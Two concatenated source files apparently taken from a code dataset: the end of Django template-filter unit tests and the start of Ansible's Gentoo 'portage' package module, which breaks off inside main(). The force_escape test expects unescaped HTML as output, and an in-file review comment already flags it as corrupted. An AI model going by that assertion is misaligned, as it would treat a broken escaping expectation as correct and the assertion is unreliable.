        self.assertEqual(slugify(u"Un \xe9l\xe9phant \xe0 l'or\xe9e du bois"),
                          u'un-elephant-a-loree-du-bois')
    def test_stringformat(self):
        self.assertEqual(stringformat(1, u'03d'), u'001')
        # An invalid format spec yields the empty string, not an exception.
        self.assertEqual(stringformat(1, u'z'), u'')
    def test_title(self):
        self.assertEqual(title('a nice title, isn\'t it?'),
                          u"A Nice Title, Isn't It?")
        self.assertEqual(title(u'discoth\xe8que'), u'Discoth\xe8que')
    def test_truncatewords(self):
        self.assertEqual(
            truncatewords(u'A sentence with a few words in it', 1), u'A ...')
        self.assertEqual(
            truncatewords(u'A sentence with a few words in it', 5),
            u'A sentence with a few ...')
        self.assertEqual(
            truncatewords(u'A sentence with a few words in it', 100),
            u'A sentence with a few words in it')
        # A non-numeric count leaves the input unchanged.
        self.assertEqual(
            truncatewords(u'A sentence with a few words in it',
            'not a number'), u'A sentence with a few words in it')
    def test_truncatewords_html(self):
        # HTML-aware truncation must close any tags left open at the cut.
        self.assertEqual(truncatewords_html(
            u'<p>one <a href="#">two - three <br>four</a> five</p>', 0), u'')
        self.assertEqual(truncatewords_html(u'<p>one <a href="#">two - '\
            u'three <br>four</a> five</p>', 2),
            u'<p>one <a href="#">two ...</a></p>')
        self.assertEqual(truncatewords_html(
            u'<p>one <a href="#">two - three <br>four</a> five</p>', 4),
            u'<p>one <a href="#">two - three <br>four ...</a></p>')
        self.assertEqual(truncatewords_html(
            u'<p>one <a href="#">two - three <br>four</a> five</p>', 5),
            u'<p>one <a href="#">two - three <br>four</a> five</p>')
        self.assertEqual(truncatewords_html(
            u'<p>one <a href="#">two - three <br>four</a> five</p>', 100),
            u'<p>one <a href="#">two - three <br>four</a> five</p>')
        self.assertEqual(truncatewords_html(
            u'\xc5ngstr\xf6m was here', 1), u'\xc5ngstr\xf6m ...')
    def test_upper(self):
        self.assertEqual(upper(u'Mixed case input'), u'MIXED CASE INPUT')
        # lowercase e umlaut
        self.assertEqual(upper(u'\xeb'), u'\xcb')
    def test_urlencode(self):
        self.assertEqual(urlencode(u'fran\xe7ois & jill'),
                          u'fran%C3%A7ois%20%26%20jill')
        self.assertEqual(urlencode(1), u'1')
    def test_iriencode(self):
        self.assertEqual(iriencode(u'S\xf8r-Tr\xf8ndelag'),
                          u'S%C3%B8r-Tr%C3%B8ndelag')
        # iriencode must be a no-op on already-urlencoded text.
        self.assertEqual(iriencode(urlencode(u'fran\xe7ois & jill')),
                          u'fran%C3%A7ois%20%26%20jill')
    def test_urlizetrunc(self):
        # URLs shorter than the limit pass through untruncated.
        self.assertEqual(urlizetrunc(u'http://short.com/', 20), u'<a href='\
            u'"http://short.com/" rel="nofollow">http://short.com/</a>')
        self.assertEqual(urlizetrunc(u'http://www.google.co.uk/search?hl=en'\
            u'&q=some+long+url&btnG=Search&meta=', 20), u'<a href="http://'\
            u'www.google.co.uk/search?hl=en&q=some+long+url&btnG=Search&'\
            u'meta=" rel="nofollow">http://www.google...</a>')
        self.assertEqual(urlizetrunc('http://www.google.co.uk/search?hl=en'\
            u'&q=some+long+url&btnG=Search&meta=', 20), u'<a href="http://'\
            u'www.google.co.uk/search?hl=en&q=some+long+url&btnG=Search'\
            u'&meta=" rel="nofollow">http://www.google...</a>')
        # Check truncating of URIs which are the exact length
        uri = 'http://31characteruri.com/test/'
        self.assertEqual(len(uri), 31)
        self.assertEqual(urlizetrunc(uri, 31),
            u'<a href="http://31characteruri.com/test/" rel="nofollow">'\
            u'http://31characteruri.com/test/</a>')
        self.assertEqual(urlizetrunc(uri, 30),
            u'<a href="http://31characteruri.com/test/" rel="nofollow">'\
            u'http://31characteruri.com/t...</a>')
        self.assertEqual(urlizetrunc(uri, 2),
            u'<a href="http://31characteruri.com/test/"'\
            u' rel="nofollow">...</a>')
    def test_urlize(self):
        # Check normal urlize
        self.assertEqual(urlize('http://google.com'),
            u'<a href="http://google.com" rel="nofollow">http://google.com</a>')
        self.assertEqual(urlize('http://google.com/'),
            u'<a href="http://google.com/" rel="nofollow">http://google.com/</a>')
        self.assertEqual(urlize('www.google.com'),
            u'<a href="http://www.google.com" rel="nofollow">www.google.com</a>')
        self.assertEqual(urlize('djangoproject.org'),
            u'<a href="http://djangoproject.org" rel="nofollow">djangoproject.org</a>')
        self.assertEqual(urlize('info@djangoproject.org'),
            u'<a href="mailto:info@djangoproject.org">info@djangoproject.org</a>')
        # Check urlize with https addresses
        self.assertEqual(urlize('https://google.com'),
            u'<a href="https://google.com" rel="nofollow">https://google.com</a>')
    def test_wordcount(self):
        self.assertEqual(wordcount(''), 0)
        self.assertEqual(wordcount(u'oneword'), 1)
        self.assertEqual(wordcount(u'lots of words'), 3)
        # NOTE(review): the wordwrap assertions below arguably belong in a
        # separate test_wordwrap method.
        self.assertEqual(wordwrap(u'this is a long paragraph of text that '\
            u'really needs to be wrapped I\'m afraid', 14),
            u"this is a long\nparagraph of\ntext that\nreally needs\nto be "\
            u"wrapped\nI'm afraid")
        self.assertEqual(wordwrap(u'this is a short paragraph of text.\n  '\
            u'But this line should be indented', 14),
            u'this is a\nshort\nparagraph of\ntext.\n  But this\nline '\
            u'should be\nindented')
        self.assertEqual(wordwrap(u'this is a short paragraph of text.\n  '\
            u'But this line should be indented',15), u'this is a short\n'\
            u'paragraph of\ntext.\n  But this line\nshould be\nindented')
    def test_rjust(self):
        self.assertEqual(ljust(u'test', 10), u'test      ')
        self.assertEqual(ljust(u'test', 3), u'test')
        self.assertEqual(rjust(u'test', 10), u'      test')
        self.assertEqual(rjust(u'test', 3), u'test')
    def test_center(self):
        self.assertEqual(center(u'test', 6), u' test ')
    def test_cut(self):
        self.assertEqual(cut(u'a string to be mangled', 'a'),
                          u' string to be mngled')
        self.assertEqual(cut(u'a string to be mangled', 'ng'),
                          u'a stri to be maled')
        self.assertEqual(cut(u'a string to be mangled', 'strings'),
                          u'a string to be mangled')
    def test_force_escape(self):
        # NOTE(review): the expected values appear to have had their HTML
        # entities unescaped in this copy; confirm against upstream Django.
        self.assertEqual(
            force_escape(u'<some html & special characters > here'),
            u'<some html & special characters > here')
        self.assertEqual(
            force_escape(u'<some html & special characters > here ĐÅ€£'),
            u'<some html & special characters > here'\
            u' \u0110\xc5\u20ac\xa3')
    def test_linebreaks(self):
        self.assertEqual(linebreaks(u'line 1'), u'<p>line 1</p>')
        self.assertEqual(linebreaks(u'line 1\nline 2'),
                          u'<p>line 1<br />line 2</p>')
    def test_removetags(self):
        self.assertEqual(removetags(u'some <b>html</b> with <script>alert'\
            u'("You smell")</script> disallowed <img /> tags', 'script img'),
            u'some <b>html</b> with alert("You smell") disallowed  tags')
        self.assertEqual(striptags(u'some <b>html</b> with <script>alert'\
            u'("You smell")</script> disallowed <img /> tags'),
            u'some html with alert("You smell") disallowed  tags')
    def test_dictsort(self):
        sorted_dicts = dictsort([{'age': 23, 'name': 'Barbara-Ann'},
                                 {'age': 63, 'name': 'Ra Ra Rasputin'},
                                 {'name': 'Jonny B Goode', 'age': 18}], 'age')
        self.assertEqual([sorted(dict.items()) for dict in sorted_dicts],
            [[('age', 18), ('name', 'Jonny B Goode')],
             [('age', 23), ('name', 'Barbara-Ann')],
             [('age', 63), ('name', 'Ra Ra Rasputin')]])
    def test_dictsortreversed(self):
        sorted_dicts = dictsortreversed([{'age': 23, 'name': 'Barbara-Ann'},
                                         {'age': 63, 'name': 'Ra Ra Rasputin'},
                                         {'name': 'Jonny B Goode', 'age': 18}],
                                        'age')
        self.assertEqual([sorted(dict.items()) for dict in sorted_dicts],
            [[('age', 63), ('name', 'Ra Ra Rasputin')],
             [('age', 23), ('name', 'Barbara-Ann')],
             [('age', 18), ('name', 'Jonny B Goode')]])
    def test_first(self):
        self.assertEqual(first([0,1,2]), 0)
        self.assertEqual(first(u''), u'')
        self.assertEqual(first(u'test'), u't')
    def test_join(self):
        self.assertEqual(join([0,1,2], u'glue'), u'0glue1glue2')
    def test_length(self):
        self.assertEqual(length(u'1234'), 4)
        self.assertEqual(length([1,2,3,4]), 4)
        self.assertEqual(length_is([], 0), True)
        self.assertEqual(length_is([], 1), False)
        self.assertEqual(length_is('a', 1), True)
        self.assertEqual(length_is(u'a', 10), False)
    def test_slice(self):
        # slice_ takes the slice spec as a string, like the template syntax.
        self.assertEqual(slice_(u'abcdefg', u'0'), u'')
        self.assertEqual(slice_(u'abcdefg', u'1'), u'a')
        self.assertEqual(slice_(u'abcdefg', u'-1'), u'abcdef')
        self.assertEqual(slice_(u'abcdefg', u'1:2'), u'b')
        self.assertEqual(slice_(u'abcdefg', u'1:3'), u'bc')
        self.assertEqual(slice_(u'abcdefg', u'0::2'), u'aceg')
    def test_unordered_list(self):
        self.assertEqual(unordered_list([u'item 1', u'item 2']),
            u'\t<li>item 1</li>\n\t<li>item 2</li>')
        self.assertEqual(unordered_list([u'item 1', [u'item 1.1']]),
            u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t</ul>\n\t</li>')
        self.assertEqual(
            unordered_list([u'item 1', [u'item 1.1', u'item1.2'], u'item 2']),
            u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t\t<li>item1.2'\
            u'</li>\n\t</ul>\n\t</li>\n\t<li>item 2</li>')
        self.assertEqual(
            unordered_list([u'item 1', [u'item 1.1', [u'item 1.1.1',
                                                      [u'item 1.1.1.1']]]]),
            u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1\n\t\t<ul>\n\t\t\t<li>'\
            u'item 1.1.1\n\t\t\t<ul>\n\t\t\t\t<li>item 1.1.1.1</li>\n\t\t\t'\
            u'</ul>\n\t\t\t</li>\n\t\t</ul>\n\t\t</li>\n\t</ul>\n\t</li>')
        self.assertEqual(unordered_list(
            ['States', ['Kansas', ['Lawrence', 'Topeka'], 'Illinois']]),
            u'\t<li>States\n\t<ul>\n\t\t<li>Kansas\n\t\t<ul>\n\t\t\t<li>'\
            u'Lawrence</li>\n\t\t\t<li>Topeka</li>\n\t\t</ul>\n\t\t</li>'\
            u'\n\t\t<li>Illinois</li>\n\t</ul>\n\t</li>')
        # Items only need to be renderable via unicode(), not strings.
        class ULItem(object):
            def __init__(self, title):
              self.title = title
            def __unicode__(self):
                return u'ulitem-%s' % str(self.title)
        a = ULItem('a')
        b = ULItem('b')
        self.assertEqual(unordered_list([a,b]),
                          u'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>')
        # Old format for unordered lists should still work
        self.assertEqual(unordered_list([u'item 1', []]), u'\t<li>item 1</li>')
        self.assertEqual(unordered_list([u'item 1', [[u'item 1.1', []]]]),
            u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t</ul>\n\t</li>')
        self.assertEqual(unordered_list([u'item 1', [[u'item 1.1', []],
            [u'item 1.2', []]]]), u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1'\
            u'</li>\n\t\t<li>item 1.2</li>\n\t</ul>\n\t</li>')
        self.assertEqual(unordered_list(['States', [['Kansas', [['Lawrence',
            []], ['Topeka', []]]], ['Illinois', []]]]), u'\t<li>States\n\t'\
            u'<ul>\n\t\t<li>Kansas\n\t\t<ul>\n\t\t\t<li>Lawrence</li>'\
            u'\n\t\t\t<li>Topeka</li>\n\t\t</ul>\n\t\t</li>\n\t\t<li>'\
            u'Illinois</li>\n\t</ul>\n\t</li>')
    def test_add(self):
        # add coerces numeric strings before summing.
        self.assertEqual(add(u'1', u'2'), 3)
    def test_get_digit(self):
        # Digits are counted from the right; position 0 returns the input.
        self.assertEqual(get_digit(123, 1), 3)
        self.assertEqual(get_digit(123, 2), 2)
        self.assertEqual(get_digit(123, 3), 1)
        self.assertEqual(get_digit(123, 4), 0)
        self.assertEqual(get_digit(123, 0), 123)
        self.assertEqual(get_digit(u'xyz', 0), u'xyz')
    def test_date(self):
        # real testing of date() is in dateformat.py
        self.assertEqual(date(datetime.datetime(2005, 12, 29), u"d F Y"),
                          u'29 December 2005')
        self.assertEqual(date(datetime.datetime(2005, 12, 29), ur'jS o\f F'),
                          u'29th of December')
    def test_time(self):
        # real testing of time() is done in dateformat.py
        self.assertEqual(time(datetime.time(13), u"h"), u'01')
        self.assertEqual(time(datetime.time(0), u"h"), u'12')
    def test_timesince(self):
        # real testing is done in timesince.py, where we can provide our own 'now'
        self.assertEqual(
            timesince(datetime.datetime.now() - datetime.timedelta(1)),
            u'1 day')
        self.assertEqual(
            timesince(datetime.datetime(2005, 12, 29),
                      datetime.datetime(2005, 12, 30)),
            u'1 day')
    def test_timeuntil(self):
        self.assertEqual(
            timeuntil(datetime.datetime.now() + datetime.timedelta(1)),
            u'1 day')
        self.assertEqual(timeuntil(datetime.datetime(2005, 12, 30),
                                   datetime.datetime(2005, 12, 29)),
                                   u'1 day')
    def test_default(self):
        # default replaces any falsy value, including the empty string.
        self.assertEqual(default(u"val", u"default"), u'val')
        self.assertEqual(default(None, u"default"), u'default')
        self.assertEqual(default(u'', u"default"), u'default')
    def test_if_none(self):
        # default_if_none only replaces None, not other falsy values.
        self.assertEqual(default_if_none(u"val", u"default"), u'val')
        self.assertEqual(default_if_none(None, u"default"), u'default')
        self.assertEqual(default_if_none(u'', u"default"), u'')
    def test_divisibleby(self):
        self.assertEqual(divisibleby(4, 2), True)
        self.assertEqual(divisibleby(4, 3), False)
    def test_yesno(self):
        self.assertEqual(yesno(True), u'yes')
        self.assertEqual(yesno(False), u'no')
        self.assertEqual(yesno(None), u'maybe')
        self.assertEqual(yesno(True, u'certainly,get out of town,perhaps'),
                          u'certainly')
        self.assertEqual(yesno(False, u'certainly,get out of town,perhaps'),
                          u'get out of town')
        self.assertEqual(yesno(None, u'certainly,get out of town,perhaps'),
                          u'perhaps')
        # With only two mappings, None falls back to the "no" value.
        self.assertEqual(yesno(None, u'certainly,get out of town'),
                          u'get out of town')
    def test_filesizeformat(self):
        self.assertEqual(filesizeformat(1023), u'1023 bytes')
        self.assertEqual(filesizeformat(1024), u'1.0 KB')
        self.assertEqual(filesizeformat(10*1024), u'10.0 KB')
        self.assertEqual(filesizeformat(1024*1024-1), u'1024.0 KB')
        self.assertEqual(filesizeformat(1024*1024), u'1.0 MB')
        self.assertEqual(filesizeformat(1024*1024*50), u'50.0 MB')
        self.assertEqual(filesizeformat(1024*1024*1024-1), u'1024.0 MB')
        self.assertEqual(filesizeformat(1024*1024*1024), u'1.0 GB')
        self.assertEqual(filesizeformat(1024*1024*1024*1024), u'1.0 TB')
        self.assertEqual(filesizeformat(1024*1024*1024*1024*1024), u'1.0 PB')
        self.assertEqual(filesizeformat(1024*1024*1024*1024*1024*2000),
                          u'2000.0 PB')
        # Non-numeric input is reported as zero rather than raising.
        self.assertEqual(filesizeformat(complex(1,-1)), u'0 bytes')
        self.assertEqual(filesizeformat(""), u'0 bytes')
        self.assertEqual(filesizeformat(u"\N{GREEK SMALL LETTER ALPHA}"),
                          u'0 bytes')
    def test_localized_filesizeformat(self):
        # With L10N active and the 'de' locale, numbers use a decimal comma.
        from django.utils.translation import activate, deactivate
        old_localize = settings.USE_L10N
        try:
            activate('de')
            settings.USE_L10N = True
            self.assertEqual(filesizeformat(1023), u'1023 Bytes')
            self.assertEqual(filesizeformat(1024), u'1,0 KB')
            self.assertEqual(filesizeformat(10*1024), u'10,0 KB')
            self.assertEqual(filesizeformat(1024*1024-1), u'1024,0 KB')
            self.assertEqual(filesizeformat(1024*1024), u'1,0 MB')
            self.assertEqual(filesizeformat(1024*1024*50), u'50,0 MB')
            self.assertEqual(filesizeformat(1024*1024*1024-1), u'1024,0 MB')
            self.assertEqual(filesizeformat(1024*1024*1024), u'1,0 GB')
            self.assertEqual(filesizeformat(1024*1024*1024*1024), u'1,0 TB')
            self.assertEqual(filesizeformat(1024*1024*1024*1024*1024),
                              u'1,0 PB')
            self.assertEqual(filesizeformat(1024*1024*1024*1024*1024*2000),
                              u'2000,0 PB')
            self.assertEqual(filesizeformat(complex(1,-1)), u'0 Bytes')
            self.assertEqual(filesizeformat(""), u'0 Bytes')
            self.assertEqual(filesizeformat(u"\N{GREEK SMALL LETTER ALPHA}"),
                              u'0 Bytes')
        finally:
            # Always restore global translation/L10N state for other tests.
            deactivate()
            settings.USE_L10N = old_localize
    def test_pluralize(self):
        self.assertEqual(pluralize(1), u'')
        self.assertEqual(pluralize(0), u's')
        self.assertEqual(pluralize(2), u's')
        self.assertEqual(pluralize([1]), u'')
        self.assertEqual(pluralize([]), u's')
        self.assertEqual(pluralize([1,2,3]), u's')
        self.assertEqual(pluralize(1,u'es'), u'')
        self.assertEqual(pluralize(0,u'es'), u'es')
        self.assertEqual(pluralize(2,u'es'), u'es')
        self.assertEqual(pluralize(1,u'y,ies'), u'y')
        self.assertEqual(pluralize(0,u'y,ies'), u'ies')
        self.assertEqual(pluralize(2,u'y,ies'), u'ies')
        # More than two comma-separated variants is invalid -> empty string.
        self.assertEqual(pluralize(0,u'y,ies,error'), u'')
    def test_phone2numeric(self):
        self.assertEqual(phone2numeric(u'0800 flowers'), u'0800 3569377')
    def test_non_string_input(self):
        # Filters shouldn't break if passed non-strings
        self.assertEqual(addslashes(123), u'123')
        self.assertEqual(linenumbers(123), u'1. 123')
        self.assertEqual(lower(123), u'123')
        self.assertEqual(make_list(123), [u'1', u'2', u'3'])
        self.assertEqual(slugify(123), u'123')
        self.assertEqual(title(123), u'123')
        self.assertEqual(truncatewords(123, 2), u'123')
        self.assertEqual(upper(123), u'123')
        self.assertEqual(urlencode(123), u'123')
        self.assertEqual(urlize(123), u'123')
        self.assertEqual(urlizetrunc(123, 1), u'123')
        self.assertEqual(wordcount(123), 1)
        self.assertEqual(wordwrap(123, 2), u'123')
        self.assertEqual(ljust('123', 4), u'123 ')
        self.assertEqual(rjust('123', 4), u' 123')
        self.assertEqual(center('123', 5), u' 123 ')
        self.assertEqual(center('123', 6), u' 123  ')
        self.assertEqual(cut(123, '2'), u'13')
        self.assertEqual(escape(123), u'123')
        self.assertEqual(linebreaks(123), u'<p>123</p>')
        self.assertEqual(linebreaksbr(123), u'123')
        self.assertEqual(removetags(123, 'a'), u'123')
        self.assertEqual(striptags(123), u'123')
| bsd-3-clause |
tszym/ansible | lib/ansible/modules/packaging/os/portage.py | 7 | 13976 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, William L Thomson Jr
# (c) 2013, Yap Sok Ann
# Written by Yap Sok Ann <sokann@gmail.com>
# Modified by William L. Thomson Jr. <wlt@o-sinc.com>
# Based on apt module written by Matthew Williams <matthew@flowroute.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: portage
short_description: Package manager for Gentoo
description:
- Manages Gentoo packages
version_added: "1.6"
options:
package:
description:
- Package atom or set, e.g. C(sys-apps/foo) or C(>foo-2.13) or C(@world)
required: false
default: null
state:
description:
- State of the package atom
required: false
default: "present"
choices: [ "present", "installed", "emerged", "absent", "removed", "unmerged", "latest" ]
update:
description:
- Update packages to the best version available (--update)
required: false
default: no
choices: [ "yes", "no" ]
deep:
description:
- Consider the entire dependency tree of packages (--deep)
required: false
default: no
choices: [ "yes", "no" ]
newuse:
description:
- Include installed packages where USE flags have changed (--newuse)
required: false
default: no
choices: [ "yes", "no" ]
changed_use:
description:
- Include installed packages where USE flags have changed, except when
- flags that the user has not enabled are added or removed
- (--changed-use)
required: false
default: no
choices: [ "yes", "no" ]
version_added: 1.8
oneshot:
description:
- Do not add the packages to the world file (--oneshot)
required: false
default: False
choices: [ "yes", "no" ]
noreplace:
description:
- Do not re-emerge installed packages (--noreplace)
required: false
default: False
choices: [ "yes", "no" ]
nodeps:
description:
- Only merge packages but not their dependencies (--nodeps)
required: false
default: False
choices: [ "yes", "no" ]
onlydeps:
description:
- Only merge packages' dependencies but not the packages (--onlydeps)
required: false
default: False
choices: [ "yes", "no" ]
depclean:
description:
- Remove packages not needed by explicitly merged packages (--depclean)
- If no package is specified, clean up the world's dependencies
- Otherwise, --depclean serves as a dependency aware version of --unmerge
required: false
default: False
choices: [ "yes", "no" ]
quiet:
description:
- Run emerge in quiet mode (--quiet)
required: false
default: False
choices: [ "yes", "no" ]
verbose:
description:
- Run emerge in verbose mode (--verbose)
required: false
default: False
choices: [ "yes", "no" ]
sync:
description:
- Sync package repositories first
- If yes, perform "emerge --sync"
- If web, perform "emerge-webrsync"
required: false
default: null
choices: [ "web", "yes", "no" ]
getbinpkg:
description:
- Prefer packages specified at PORTAGE_BINHOST in make.conf
required: false
default: False
choices: [ "yes", "no" ]
usepkgonly:
description:
- Merge only binaries (no compiling). This sets getbinpkg=yes.
required: false
default: False
choices: [ "yes", "no" ]
keepgoing:
description:
- Continue as much as possible after an error.
required: false
default: False
choices: [ "yes", "no" ]
version_added: 2.3
jobs:
description:
- Specifies the number of packages to build simultaneously.
required: false
default: None
version_added: 2.3
loadavg:
description:
- Specifies that no new builds should be started if there are
- other builds running and the load average is at least LOAD
required: false
default: None
version_added: 2.3
requirements: [ gentoolkit ]
author:
- "William L Thomson Jr (@wltjr)"
- "Yap Sok Ann (@sayap)"
- "Andrew Udvare"
notes: []
'''
EXAMPLES = '''
# Make sure package foo is installed
- portage:
package: foo
state: present
# Make sure package foo is not installed
- portage:
package: foo
state: absent
# Update package foo to the "latest" version ( os specific alternative to latest )
- portage:
package: foo
update: yes
# Install package foo using PORTAGE_BINHOST setup
- portage:
package: foo
getbinpkg: yes
# Re-install world from binary packages only and do not allow any compiling
- portage:
package: '@world'
usepkgonly: yes
# Sync repositories and update world
- portage:
package: '@world'
update: yes
deep: yes
sync: yes
# Remove unneeded packages
- portage:
depclean: yes
# Remove package foo if it is not explicitly needed
- portage:
package: foo
state: absent
depclean: yes
'''
import os
import pipes
import re
def query_package(module, package, action):
    """Return True if *package* (a set or an atom) is currently installed.

    Package sets are written with a leading '@' and are looked up in the
    world sets file; anything else is treated as a plain package atom.
    """
    handler = query_set if package.startswith('@') else query_atom
    return handler(module, package, action)
def query_atom(module, atom, action):
    """Return True if the given package atom is installed.

    Installation status is probed with ``equery list <atom>``, which exits
    with status 0 exactly when the atom matches an installed package.
    """
    rc, _out, _err = module.run_command(
        '%s list %s' % (module.equery_path, atom))
    return rc == 0
def query_set(module, set, action):
    """Return True if the named package set appears in the world sets file.

    Built-in system sets are always considered absent from the world sets
    file (they exist implicitly) and may never be unmerged.
    """
    system_sets = (
        '@live-rebuild',
        '@module-rebuild',
        '@preserved-rebuild',
        '@security',
        '@selected',
        '@system',
        '@world',
        '@x11-module-rebuild',
    )
    if set in system_sets:
        if action == 'unmerge':
            module.fail_json(msg='set %s cannot be removed' % set)
        return False
    world_sets_path = '/var/lib/portage/world_sets'
    if not os.path.exists(world_sets_path):
        return False
    # Membership test is a plain grep, mirroring what portage records.
    rc, _out, _err = module.run_command(
        'grep %s %s' % (set, world_sets_path))
    return rc == 0
def sync_repositories(module, webrsync=False):
    """Synchronise the portage repositories.

    Uses ``emerge --sync`` by default, or ``emerge-webrsync`` when
    *webrsync* is true. Fails the module if the sync command exits
    non-zero; exits immediately in check mode (sync cannot be simulated).
    """
    if module.check_mode:
        module.exit_json(msg='check mode not supported by sync')
    if webrsync:
        cmd = '%s --quiet' % module.get_bin_path('emerge-webrsync',
                                                 required=True)
    else:
        cmd = '%s --sync --quiet --ask=n' % module.emerge_path
    rc, _out, _err = module.run_command(cmd)
    if rc != 0:
        module.fail_json(msg='could not sync package repositories')
# Note: In the 3 functions below, equery is done one-by-one, but emerge is done
# in one go. If that is not desirable, split the packages into multiple tasks
# instead of joining them together with comma.
def emerge_packages(module, packages):
    """Install (emerge) *packages* according to the module parameters.

    Exits the module via exit_json/fail_json in every path; never returns
    a value to the caller. ``packages`` may be empty (e.g. for @world-style
    runs driven purely by flags).
    """
    p = module.params
    # Unless an update/noreplace/latest run was requested, short-circuit
    # when every requested package is already installed.
    if not (p['update'] or p['noreplace'] or p['state']=='latest'):
        for package in packages:
            if not query_package(module, package, 'emerge'):
                break
        else:
            module.exit_json(changed=False, msg='Packages already present.')
        if module.check_mode:
            module.exit_json(changed=True, msg='Packages would be installed.')
    args = []
    # Boolean module parameters that map 1:1 onto emerge flags.
    emerge_flags = {
        'update': '--update',
        'deep': '--deep',
        'newuse': '--newuse',
        'changed_use': '--changed-use',
        'oneshot': '--oneshot',
        'noreplace': '--noreplace',
        'nodeps': '--nodeps',
        'onlydeps': '--onlydeps',
        'quiet': '--quiet',
        'verbose': '--verbose',
        'getbinpkg': '--getbinpkg',
        'usepkgonly': '--usepkgonly',
        'usepkg': '--usepkg',
        'keepgoing': '--keep-going',
    }
    for flag, arg in emerge_flags.items():
        if p[flag]:
            args.append(arg)
    # state=latest is expressed to emerge as --update.
    if p['state'] and p['state']=='latest':
        args.append("--update")
    if p['usepkg'] and p['usepkgonly']:
        module.fail_json(msg='Use only one of usepkg, usepkgonly')
    # Value-carrying parameters; note the argument is concatenated directly,
    # hence the '=' / trailing space in the option templates.
    emerge_flags = {
        'jobs': '--jobs=',
        'loadavg': '--load-average ',
    }
    for flag, arg in emerge_flags.items():
        if p[flag] is not None:
            args.append(arg + str(p[flag]))
    cmd, (rc, out, err) = run_emerge(module, packages, *args)
    if rc != 0:
        module.fail_json(
            cmd=cmd, rc=rc, stdout=out, stderr=err,
            msg='Packages not installed.',
        )
    # Check for SSH error with PORTAGE_BINHOST, since rc is still 0 despite
    # this error
    if (p['usepkgonly'] or p['getbinpkg']) \
            and 'Permission denied (publickey).' in err:
        module.fail_json(
            cmd=cmd, rc=rc, stdout=out, stderr=err,
            msg='Please check your PORTAGE_BINHOST configuration in make.conf '
                'and your SSH authorized_keys file',
        )
    # Decide "changed" by scanning emerge's output: a real run prints an
    # "Emerging (1 of N)" line, a check-mode run prints [binary]/[ebuild]
    # pretend lines. No match means nothing was (or would be) installed.
    changed = True
    for line in out.splitlines():
        if re.match(r'(?:>+) Emerging (?:binary )?\(1 of', line):
            msg = 'Packages installed.'
            break
        elif module.check_mode and re.match(r'\[(binary|ebuild)', line):
            msg = 'Packages would be installed.'
            break
    else:
        changed = False
        msg = 'No packages installed.'
    module.exit_json(
        changed=changed, cmd=cmd, rc=rc, stdout=out, stderr=err,
        msg=msg,
    )
def unmerge_packages(module, packages):
    """Remove *packages* with ``emerge --unmerge``.

    Exits the module via exit_json/fail_json in every path. Does nothing
    (changed=False) when none of the packages is currently installed.
    """
    p = module.params
    # any() short-circuits on the first installed package, exactly like the
    # classic for/else scan it replaces.
    if not any(query_package(module, pkg, 'unmerge') for pkg in packages):
        module.exit_json(changed=False, msg='Packages already absent.')
    args = ['--unmerge']
    args.extend('--%s' % flag for flag in ('quiet', 'verbose') if p[flag])
    cmd, (rc, out, err) = run_emerge(module, packages, *args)
    if rc != 0:
        module.fail_json(
            cmd=cmd, rc=rc, stdout=out, stderr=err,
            msg='Packages not removed.',
        )
    module.exit_json(
        changed=True, cmd=cmd, rc=rc, stdout=out, stderr=err,
        msg='Packages removed.',
    )
def cleanup_packages(module, packages):
    """Run ``emerge --depclean``, optionally restricted to *packages*.

    With an explicit package list, acts as a dependency-aware unmerge and
    does nothing when none of the packages is installed. With an empty
    list, depcleans the whole world set. Exits via exit_json/fail_json.
    """
    p = module.params
    if packages:
        if not any(query_package(module, pkg, 'unmerge') for pkg in packages):
            module.exit_json(changed=False, msg='Packages already absent.')
    args = ['--depclean']
    args.extend('--%s' % flag for flag in ('quiet', 'verbose') if p[flag])
    cmd, (rc, out, err) = run_emerge(module, packages, *args)
    if rc != 0:
        module.fail_json(cmd=cmd, rc=rc, stdout=out, stderr=err)
    # Parse the "Number removed: N" summary emerge prints; anything
    # removed means the system changed.
    removed = 0
    for line in out.splitlines():
        if line.startswith('Number removed:'):
            removed = int(line.split(':')[1].strip())
    module.exit_json(
        changed=removed > 0, cmd=cmd, rc=rc, stdout=out, stderr=err,
        msg='Depclean completed.',
    )
def run_emerge(module, packages, *args):
    """Execute emerge with the given flags and packages.

    Returns ``(cmd, (rc, stdout, stderr))`` so callers can report the
    exact command line. In check mode, ``--pretend`` makes emerge report
    what it would do without doing it.
    """
    extra = list(args) + ['--ask=n']
    if module.check_mode:
        extra.append('--pretend')
    cmd = [module.emerge_path] + extra + packages
    return cmd, module.run_command(cmd)
# State aliases accepted by the module: each group maps to one action
# (emerge for the present-like states, emerge --unmerge for the absent-like
# states). The first entry of portage_present_states is the default state.
portage_present_states = ['present', 'emerged', 'installed', 'latest']
portage_absent_states = ['absent', 'unmerged', 'removed']
def main():
    """Module entry point: parse arguments, then dispatch to sync,
    depclean, emerge, or unmerge according to the requested state."""
    module = AnsibleModule(
        argument_spec=dict(
            package=dict(default=None, aliases=['name'], type='list'),
            state=dict(
                default=portage_present_states[0],
                choices=portage_present_states + portage_absent_states,
            ),
            update=dict(default=False, type='bool'),
            deep=dict(default=False, type='bool'),
            newuse=dict(default=False, type='bool'),
            changed_use=dict(default=False, type='bool'),
            oneshot=dict(default=False, type='bool'),
            noreplace=dict(default=False, type='bool'),
            nodeps=dict(default=False, type='bool'),
            onlydeps=dict(default=False, type='bool'),
            depclean=dict(default=False, type='bool'),
            quiet=dict(default=False, type='bool'),
            verbose=dict(default=False, type='bool'),
            sync=dict(default=None, choices=['yes', 'web', 'no']),
            getbinpkg=dict(default=False, type='bool'),
            usepkgonly=dict(default=False, type='bool'),
            usepkg=dict(default=False, type='bool'),
            keepgoing=dict(default=False, type='bool'),
            jobs=dict(default=None, type='int'),
            loadavg=dict(default=None, type='float'),
        ),
        required_one_of=[['package', 'sync', 'depclean']],
